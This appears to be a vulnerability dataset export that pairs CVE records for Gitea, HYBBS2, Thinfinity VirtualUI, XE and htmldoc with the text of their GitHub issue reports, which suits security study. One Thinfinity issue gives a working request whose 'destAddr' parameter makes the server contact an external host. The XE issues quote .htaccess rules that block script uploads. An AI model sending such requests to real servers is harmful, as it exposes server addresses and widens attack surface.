cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2021-45326
2022-02-08T15:15:07.767
Cross Site Request Forgery (CSRF) vulnerability exists in Gitea before 1.5.2 via API routes.This can be dangerous especially with state altering POST requests.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://blog.gitea.io/2018/10/gitea-1.5.2-is-released/" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/go-gitea/gitea/issues/4838" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/go-gitea/gitea/pull/4840" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://blog.gitea.io/2018/10/gitea-1.5.2-is-released/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/go-gitea/gitea/issues/4838" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/go-gitea/gitea/pull/4840" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6BA0450-9E23-485E-8E8D-DABAAB75F206", "versionEndExcluding": "1.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/go-gitea/gitea/issues/4838
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "go-gitea", "gitea" ]
# The Vulnerabilities on GET Routes For historical reasons some GET routes in Gitea do more than getting info and actually change state, for example /user/logout, and GET routes with action/:action in it. Current CSRF handler only checks POST routes, and thus leaves those GET routes vulnerable. One particular route admin/notices/empty should probably be a POST i/o GET route. # Strategies We are working on a PR to address these vulnerabilities, and would like the community feedback on the best strategy. ## Option 1: reuse existing CSRF token + referrer-policy header (WARNING! BAD IDEA, Don't do this. See comments below for reason.) In this option we will append the existing CSRF token to vulnerable GET routes as a query string, validate the token. A referrer-policy header can be set to same origin to prevent abuse of the token. This option has less changes to existing code. ## Option 2: generate a new JWT token with a key exclusive for this purpose In this option we will generate a new JWT token and send to the browser via a new cookie. This will have more changes to the code. # Questions ## security concerns on reusing csrf token on URL We are thinking to implement option 1, and have code already done. It has less code changes and hopefully can be merged soon. Are there any concerns on this option 1? ## response code or redirect What should we do if the required token is missing or invalid? Should we redirect to home page, or return 403? Browsers treat 403 error code differently, for example Chrome on Mac displays the following message which may not be what you want. ``` This site can’t be reached The web page at https://gitea.on-my-super-domain.dummy/user/logout might be temporarily down or it may have moved permanently to a new web address. ERR_INVALID_RESPONSE ``` # Potential Impact Both options require an extra handler on vulnerable routes to check the token in query string, and minor changes in URL in templates. While the PR can include the new token in default templates, this is potentially a breaking change to people using custom templates. The custom templates need to be updated to include the token in generated URL.
[Proposal] CSRF checks on GET routes
https://api.github.com/repos/go-gitea/gitea/issues/4838/comments
24
2018-09-01T00:19:24Z
2020-11-24T00:06:48Z
https://github.com/go-gitea/gitea/issues/4838
356,154,901
4,838
3,180
CVE-2021-45328
2022-02-08T16:15:07.413
Gitea before 1.4.3 is affected by URL Redirection to Untrusted Site ('Open Redirect') via internal URLs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://blog.gitea.io/2018/06/release-of-1.4.3/" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/go-gitea/gitea/issues/4332" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://blog.gitea.io/2018/06/release-of-1.4.3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/go-gitea/gitea/issues/4332" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*", "matchCriteriaId": "117B5786-635D-4D65-BE40-971E8B147C47", "versionEndExcluding": "1.4.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/go-gitea/gitea/issues/4332
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "go-gitea", "gitea" ]
<!-- 1. Please speak English, this is the language all of us can speak and write. 2. Please ask questions or configuration/deploy problems on our Discord server (https://discord.gg/NsatcWJ) or forum (https://discourse.gitea.io). 3. Please take a moment to check that your issue doesn't already exist. 4. Please give all relevant information below for bug reports, because incomplete details will be handled as an invalid report. --> - Gitea version (or commit ref): all - Git version: not relevant - Operating system: not relevant - Database (use `[x]`): - [ ] PostgreSQL - [ ] MySQL - [ ] MSSQL - [ ] SQLite - Can you reproduce the bug at https://try.gitea.io: - [x] Yes (provide example URL) - [ ] No - [ ] Not relevant - Log gist: not relevent ## Description ## Screenshots <!-- **If this issue involves the Web Interface, please include a screenshot** -->
Open Redirect vulnerability on internal links
https://api.github.com/repos/go-gitea/gitea/issues/4332/comments
1
2018-06-28T14:02:25Z
2020-11-24T01:58:06Z
https://github.com/go-gitea/gitea/issues/4332
336,635,224
4,332
3,181
CVE-2022-24676
2022-02-09T00:15:07.477
update_code in Admin.php in HYBBS2 through 2.3.2 allows arbitrary file upload via a crafted ZIP archive.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hyyyp/HYBBS2/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hyyyp/HYBBS2/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hyphp:hybbs2:*:*:*:*:*:*:*:*", "matchCriteriaId": "EB71B302-CAF8-495C-92E9-E3AEE02CB6DF", "versionEndExcluding": "2.3.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/hyyyp/HYBBS2/issues/33
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hyyyp", "HYBBS2" ]
# There is an arbitrary file upload vulnerability in the HYBBS upload plugin function ## Vulnerability overview There is an arbitrary file upload vulnerability in the upload plugin function of the HYBBS management background, which can lead to server permissions. ## Vulnerability scope All versions prior to HYBBS 2.3.3 ## Vulnerability environment construction Clone the latest code factory library of HYBBS to the local, and then use phpstudy to build HYBBS. ## Vulnerability reproduction steps Make a malicious zip archive as shown below ![2022-02-07-16-46-39](https://user-images.githubusercontent.com/24275308/152767306-58978ef7-035f-4fef-aff4-abcba6ea710a.png) Upload malicious zip archives in the management background upload plugin function ![2022-02-07-16-50-42](https://user-images.githubusercontent.com/24275308/152767339-1bd955e4-4ae9-48a0-bddf-5c98d3b3ec9f.png) After uploading, it prompts that the upload was successful ![2022-02-07-16-52-20](https://user-images.githubusercontent.com/24275308/152767359-fd97800a-d407-4cf8-95de-11b91c8ba742.png) It can be seen from the log of the folder monitoring software that HYBBS renamed the malicious compressed package and extracted it to the Plugin directory ![2022-02-07-16-54-43](https://user-images.githubusercontent.com/24275308/152767371-8b28406d-a81e-476c-a665-c8df96e8177f.png) ![2022-02-07-16-57-40](https://user-images.githubusercontent.com/24275308/152767390-25a3eb0d-c127-453d-b5e7-7d5d61fbaebd.png) ## Vulnerability code analysis Locate the code of the plugin upload function ![2022-02-07-17-13-57](https://user-images.githubusercontent.com/24275308/152767409-6f5b01e8-784a-48a4-9100-c9b631079329.png) ![2022-02-07-17-14-07](https://user-images.githubusercontent.com/24275308/152767438-0707d082-dcfb-4dfd-a4e0-68f5453bcd21.png) HYBBS directly decompresses the compressed package and does not check the content of the compressed package, resulting in an arbitrary file upload vulnerability.
There is an arbitrary file upload vulnerability in the HYBBS upload plugin function
https://api.github.com/repos/hyyyp/HYBBS2/issues/33/comments
1
2022-02-07T10:08:23Z
2022-02-26T09:12:30Z
https://github.com/hyyyp/HYBBS2/issues/33
1,125,771,754
33
3,182
CVE-2021-46354
2022-02-09T14:15:07.793
Thinfinity VirtualUI 2.1.28.0, 2.1.32.1 and 2.5.26.2, fixed in version 3.0 is affected by an information disclosure vulnerability in the parameter "Addr" in cmd site. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the web server or increase the attack surface.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/166069/Thinfinity-VirtualUI-2.5.26.2-Information-Disclosure.html" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://thinfinity.com" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cybelesoft/virtualui/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/166069/Thinfinity-VirtualUI-2.5.26.2-Information-Disclosure.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://thinfinity.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cybelesoft/virtualui/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cybelesoft:thinfinity_virtualui:2.1.28.0:*:*:*:*:*:*:*", "matchCriteriaId": "E24716C8-13B0-4431-8BD4-45B9557333D7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cybelesoft:thinfinity_virtualui:2.1.32.1:*:*:*:*:*:*:*", "matchCriteriaId": "F215BC0D-F188-4ABC-ADE3-8CAD26A6F68A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cybelesoft:thinfinity_virtualui:2.5.26.2:*:*:*:*:*:*:*", "matchCriteriaId": "11EB010C-71C8-4BAD-B131-BD73983E6734", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "668" ]
668
https://github.com/cybelesoft/virtualui/issues/3
[ "Third Party Advisory" ]
github.com
[ "cybelesoft", "virtualui" ]
Dear Cybele Software, My name is Daniel Morales. I have found a vulnerability in Thinfinity VirtualUI that could allow a malicious actor to trigger a server-side request to external endpoints. ### Summary External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN) ### Payload An example of the HTTP request "https://example.com/cmd? cmd=connect&wscompression=true&destAddr=domain.com &scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=191 8&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supp ortsFullScreen=true&webapp=false" where "**domain.com**" is the external endpoint to be requested. ### Vulnerable versions It has been tested in VirtualUI version 2.1.28.0, 2.1.32.1 and 2.5.26.2
Vulnerability - External Service Interaction
https://api.github.com/repos/cybelesoft/virtualui/issues/3/comments
1
2022-01-11T11:40:02Z
2022-02-01T22:23:04Z
https://github.com/cybelesoft/virtualui/issues/3
1,099,046,708
3
3,183
CVE-2021-44911
2022-02-09T16:15:14.260
XE before 1.11.6 is vulnerable to Unrestricted file upload via modules/menu/menu.admin.controller.php. When uploading the Mouse over button and When selected button, there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML-type files leads to stored XSS vulnerabilities.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/xpressengine/xe-core/issues/2434" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/xpressengine/xe-core/issues/2434" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xpressengine:xpressengine:*:*:*:*:*:*:*:*", "matchCriteriaId": "35C2B095-1B22-40E7-97C1-23D48EA1AF29", "versionEndExcluding": "1.11.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xpressengine/xe-core/issues/2434
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "xpressengine", "xe-core" ]
Affected version: XE before 1.11.6. Vulnerable file: modules/menu/menu.admin.controller.php. #menu_hover_btn menu_active_btn Causes of vulnerability: ![1638921811742](https://user-images.githubusercontent.com/61731702/145127509-b495ce05-0a6f-4718-b24d-f0b648909d54.png) When uploading the Mouse over button and When selected button , there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML-type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE 1.11.2 version, you can upload the PHP type file to GETSHELL. # deny access to files that may contain sensitive information RewriteRule ^(.*/)?\.(editor|git|ht|jshint|travis) - [L,F] RewriteRule ^(codeception(.*)\.yml|composer(.*)\.(json|lock)|package\.json)$ - [L,F] RewriteRule ^files/(attach|config|cache/store)/.+\.(ph(p|t|ar)?[0-9]?|p?html?|cgi|pl|exe|(a|j)sp|inc)$ - [L,F] RewriteRule ^files/(env|member_extra_info/(new_message_flags|point))/ - [L,F] ![image](https://user-images.githubusercontent.com/61731702/145141447-850b9627-8a32-4600-b471-bcd5657d29b1.png) ![1638923044522](https://user-images.githubusercontent.com/61731702/145127514-69cc7598-246a-45df-af2d-5d96ae0d52d9.png) Repair suggestion: add the *html* file to the upload blacklist.
Unrestricted file upload vulnerability in Latest Release 3.3.16
https://api.github.com/repos/xpressengine/xe-core/issues/2434/comments
0
2021-12-08T00:38:20Z
2022-01-10T09:21:07Z
https://github.com/xpressengine/xe-core/issues/2434
1,073,882,107
2,434
3,184
CVE-2021-44912
2022-02-09T16:15:14.300
In XE 1.116, when uploading the Normal button, there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML-type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE 1.11.2 version, you can upload the PHP type file to GETSHELL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xpressengine/xe-core/issues/2433" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xpressengine/xe-core/issues/2433" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xpressengine:xpressengine:*:*:*:*:*:*:*:*", "matchCriteriaId": "35C2B095-1B22-40E7-97C1-23D48EA1AF29", "versionEndExcluding": "1.11.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xpressengine/xe-core/issues/2433
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xpressengine", "xe-core" ]
Affected version: XE before 1.11.6. Vulnerable file: modules/menu/menu.admin.controller.php. #menu_normal_btn Causes of vulnerability: ![1638921811742](https://user-images.githubusercontent.com/61731702/145127355-3d7b6bad-3e3e-43e4-84b0-1f942a5e46ac.png) When uploading the Normal button, there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML-type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE 1.11.2 version, you can upload the PHP type file to GETSHELL. ``` # deny access to files that may contain sensitive information RewriteRule ^(.*/)?\.(editor|git|ht|jshint|travis) - [L,F] RewriteRule ^(codeception(.*)\.yml|composer(.*)\.(json|lock)|package\.json)$ - [L,F] RewriteRule ^files/(attach|config|cache/store)/.+\.(ph(p|t|ar)?[0-9]?|p?html?|cgi|pl|exe|(a|j)sp|inc)$ - [L,F] RewriteRule ^files/(env|member_extra_info/(new_message_flags|point))/ - [L,F] ``` ![1638932924850](https://user-images.githubusercontent.com/61731702/145141594-29f76fb6-3aa3-43a7-9e7d-da0516a9f026.png) ![1638923044522](https://user-images.githubusercontent.com/61731702/145127377-133058e7-4c06-49b2-bb54-877e98990111.png) Repair suggestion: add the \*html\* file to the upload blacklist.
Unrestricted file upload vulnerability in Latest Release 3.3.16 /index.php?module=admin&act=dispMenuAdminSiteMap
https://api.github.com/repos/xpressengine/xe-core/issues/2433/comments
0
2021-12-08T00:36:19Z
2022-01-10T09:27:20Z
https://github.com/xpressengine/xe-core/issues/2433
1,073,880,895
2,433
3,185
CVE-2021-45330
2022-02-09T18:15:09.970
An issue exsits in Gitea through 1.15.7, which could let a malicious user gain privileges due to client side cookies not being deleted and the session remains valid on the server side for reuse.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/go-gitea/gitea/issues/4336" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/go-gitea/gitea/issues/4336" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*", "matchCriteriaId": "75A73D91-9EDD-467B-AA77-B8C21F0946BE", "versionEndExcluding": null, "versionEndIncluding": "1.15.7", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "459" ]
459
https://github.com/go-gitea/gitea/issues/4336
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "go-gitea", "gitea" ]
<!-- 1. Please speak English, this is the language all of us can speak and write. 2. Please ask questions or configuration/deploy problems on our Discord server (https://discord.gg/NsatcWJ) or forum (https://discourse.gitea.io). 3. Please take a moment to check that your issue doesn't already exist. 4. Please give all relevant information below for bug reports, because incomplete details will be handled as an invalid report. --> - Gitea version (or commit ref): all - Git version: not relevant - Operating system: not relevant - Database (use `[x]`): - [ ] PostgreSQL - [ ] MySQL - [ ] MSSQL - [ ] SQLite - Can you reproduce the bug at https://try.gitea.io: - [ ] Yes (provide example URL) - [ ] No - [x] Not relevant - Log gist: ## Description ## Screenshots <!-- **If this issue involves the Web Interface, please include a screenshot** -->
[Security] Log out only deletes browser cookies
https://api.github.com/repos/go-gitea/gitea/issues/4336/comments
2
2018-06-28T15:28:30Z
2022-04-28T18:03:17Z
https://github.com/go-gitea/gitea/issues/4336
336,670,906
4,336
3,186
CVE-2022-0534
2022-02-09T23:15:16.767
A vulnerability was found in htmldoc version 1.9.15 where the stack out-of-bounds read takes place in gif_get_code() and occurs when opening a malicious GIF file, which can result in a crash (segmentation fault).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
